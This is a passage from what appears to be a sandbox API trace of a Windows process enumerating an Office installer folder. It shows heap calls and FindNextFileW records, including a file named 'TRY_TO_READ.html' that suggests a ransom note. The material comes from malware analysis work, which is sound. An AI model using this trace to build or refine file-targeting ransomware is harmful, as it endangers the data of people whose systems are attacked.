hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.403] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x97269130, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97269130, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.403] GetLastError () returned 0x0 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.403] GetLastError () returned 0x0 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324ae8 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324ae8 | out: hHeap=0x2e0000) returned 1 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35e258 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35e258 | out: hHeap=0x2e0000) returned 1 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340ff0 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340ff0 | out: hHeap=0x2e0000) returned 1 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.403] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.404] GetLastError () returned 0x0 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.404] GetLastError () returned 0x0 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854d0 [0156.404] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.404] GetLastError () returned 0x0 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.404] GetLastError () returned 0x0 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0156.404] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0156.404] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.405] GetLastError () returned 0x0 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.405] GetLastError () returned 0x0 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x31d0048 [0156.405] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.405] GetLastError () returned 0x0 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.405] GetLastError () returned 0x0 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0156.405] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0156.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.405] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.406] GetLastError () returned 0x0 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.406] GetLastError () returned 0x0 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0156.406] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.406] GetLastError () returned 0x0 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.406] GetLastError () returned 0x0 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385770 [0156.406] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0156.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.407] GetLastError () returned 0x0 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.407] GetLastError () returned 0x0 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f78 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f78 | out: hHeap=0x2e0000) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x319d30 [0156.407] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.407] GetLastError () returned 0x0 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.407] GetLastError () returned 0x0 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385818 [0156.407] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.407] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.407] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.407] GetLastError () returned 0x0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.408] GetLastError () returned 0x0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3858c0 [0156.408] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97269130, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97269130, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97269130, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.408] GetLastError () returned 0x0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.408] GetLastError () returned 0x0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.408] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.408] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.408] GetLastError () returned 0x0 [0156.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.409] GetLastError () returned 0x0 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385968 [0156.409] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.409] GetLastError () returned 0x0 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.409] GetLastError () returned 0x0 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.409] HeapFree (in: 